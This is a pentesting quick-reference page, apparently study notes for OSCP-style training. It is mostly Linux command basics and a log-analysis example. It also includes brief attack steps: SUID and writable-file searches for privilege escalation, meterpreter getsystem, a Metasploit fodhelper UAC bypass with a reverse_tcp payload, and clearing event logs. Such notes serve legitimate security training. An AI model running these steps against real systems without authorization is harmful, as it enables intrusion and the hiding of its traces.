Pentesting Quick Reference OSCP and Beyond

Linux Basics

Essential Linux for Hackers.

Reference

/2/1
HACK THE BOX Academy Linux

Finding Files

find / -type f -name pass find -name *.txt 2>/dev/null

find . -writable 2>/dev/null// important to search for priv escallation

find / -perm -4000 *.txt -ls 2>/dev/null \\to view executable binaries

find / -name *.txt -ls 2>/dev/null  to list all text files in system

Locate commad

locate rockyou.txt
sudo updatedb  (essential to make a listing of directories/files)

ls with modified time

ls -t

Find files based on filename

find [directory path] -type f -name [filename]

find /home/Andy -type f -name sales.txt

Find Directory based on directory name

find [directory path] -type d -name [filename]

find /home/Andy -type d -name pictures

Find files based on size

find [directory path] -type f -size [size]

find /home/Andy -type f -size 10c

(c for bytes,

k for kilobytes

M megabytes

G for gigabytes

type:'man find' for full information on the options)

Find files based on username

find [directory path] -type f -user [username]

find /etc/server -type f -user john

Find files based on group name

find [directory path] -type f -group [group name]

find /etc/server -type f -group teamstar

Find files modified after a specific date

find [directory path] -type f -newermt '[date and time]'

find / -type f -newermt '6/30/2020 0:00:00'

(all dates/times after 6/30/2020 0:00:00 will be considered a condition to look for)

Find files based on date modified

find [directory path] -type f -newermt [start date range] ! -newermt [end date range]

find / -type f -newermt 2013-09-12 ! -newermt 2013-09-14

(all dates before 2013-09-12 will be excluded; all dates after 2013-09-14 will be excluded, therefore this only leaves 2013-09-13 as the date to look for.)

Find files based on date accessed

find [directory path] -type f -newerat [start date range] ! -newerat [end date range]

find / -type f -newerat 2017-09-12 ! -newerat 2017-09-14

(all dates before 2017-09-12 will be excluded; all dates after 2017-09-14 will be excluded, therefore this only leaves 2017-09-13 as the date to look for.)

Find files with a specific keyword

grep -iRl [directory path/keyword]

grep -iRl '/folderA/flag'

Ignore only these

grep -v "hello"

read the manual for the find command

man find

check the history of bash

history

SSH key does not work

chmod 600 for SSH key to work

Check Sudo Permissions

sudo -l (tells which programs user can run as root)

Calculate Hash

Sha256sum filename (to compute the hash)

Logs

Linux logs are located in var/log

Important commands

whoami

Displays current username.

id

Returns users identity. Gives other groups the user is part of.

hostname

Sets or prints the name of current host system.

uname -a

Prints basic information about the operating system name and system hardware.

pwd

Returns working directory name.

ifconfig

The ifconfig utility is used to assign or to view an address to a network interface and/or configure network interface parameters.

ip

Ip is a utility to show or manipulate routing, network devices, interfaces and tunnels.

netstat

Shows network status.

ss

Another utility to investigate sockets.

ps

Shows process status.

ps aux

processes by all users

top

real time view of processes

who

Displays who is logged in.

env

Prints environment or sets and executes command.

lsblk

Lists block devices.

lsusb

Lists USB devices

lsof

Lists opened files.

lspci

Lists PCI devices.

wc -l access.log

show no of lines in a file

su

The su utility requests appropriate user credentials via PAM and switches to that user ID (the default user is the superuser). A shell is then executed. su - rocketchat

useradd

Creates a new user or update default new user information.

userdel

Deletes a user account and related files.

usermod

Modifies a user account.

addgroup

Adds a group to the system.

delgroup

Removes a group from the system.

passwd

Changes user password.

lsb_release -a

Current OS version

Start stop service

systemctl stop myservice

Start
Stop
Enable (add to system start up)
Disable

Background process

ctrl+z
add & at the end
fg processid

Important Files

File

cronjobs

Crontab is one of the processes that is started during boot, which is responsible for facilitating and managing cron jobs.

A crontab is simply a special file with formatting that is recognised by the cron process to execute each line step-by-step. Crontabs require 6 specific values:

Value

Description

MIN

What minute to execute at

HOUR

What hour to execute at

DOM

What day of the month to execute at

MON

What month of the year to execute at

DOW

What day of the week to execute at

CMD

The actual command that will be executed.

crontab -l to see running crontabs

Services

Start a service

systemctl start ssh

systemctl status ssh

run a service after start up

systemctl enable ssh

Enumerate services

ps -aux

systemctl list-units --type=service

Access a shared folder

In Network tab press ctrl + L

smb://192.168.1.11

Escalate the privilege

get system
get system -t 1 for using named pipe

Bypass Windows UAC

background the session with ctrl+z

use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set paypload windows/meterpreter/reverse_tcp
run

Clear logs

clearenv

Cat alternative

if cat command does not work, try head, less, nano, vim. If not use grep

grep . hash.txt
grep -R . // displays all content of all files

Playing with text. Sorting, finding uniques values and cutting the values

# The first use of the cut command retrieves the column of the domain:port, and the second one removes the port by splitting it with a colon.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1
sway.com
sway.com
sway.office.com
--- REDACTED FOR BREVITY ---

# After retrieving the domains, the sort command arranges the list in alphabetical order

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
--- REDACTED FOR BREVITY ---

# Lastly, the uniq command removes all the duplicates

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq
account.activedirectory.windowsazure.com
activity.windows.com
admin.microsoft.com
--- REDACTED FOR BREVITY ---

We already have the list of unique domains based on our previous use case. Now, we only need to add some parameters to our commands to get the count of each domain accessed. This can be done by adding the -c option to the uniq command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c
    423 account.activedirectory.windowsazure.com
    184 activity.windows.com
    680 admin.microsoft.com
    272 admin.onedrive.com
    304 adminwebservice.microsoftonline.com

Moreover, the result can be sorted again based on the count of each domain by using the -n option of the sort command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -n
     78 partnerservices.getmicrosoftkey.com
    113 **REDACTED**
    118 ocsp.digicert.com
    123 officeclient.microsoft.com
--- REDACTED FOR BREVITY ---

Based on the result, you can see that the count of connections made for each domain is sorted in ascending order. If you want to make the output appear in descending order, use the -r option. Note that it can also be combined with the -n option (-nr if written together).

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -nr
   4992 www.office.com
   4695 login.microsoftonline.com
   1860 www.globalsign.com
   1581 **REDACTED**
   1554 learn.microsoft.com
--- REDACTED FOR BREVITY --

PreviousBasic Tools & Techniques NextWindows Basics

Last updated 1 year ago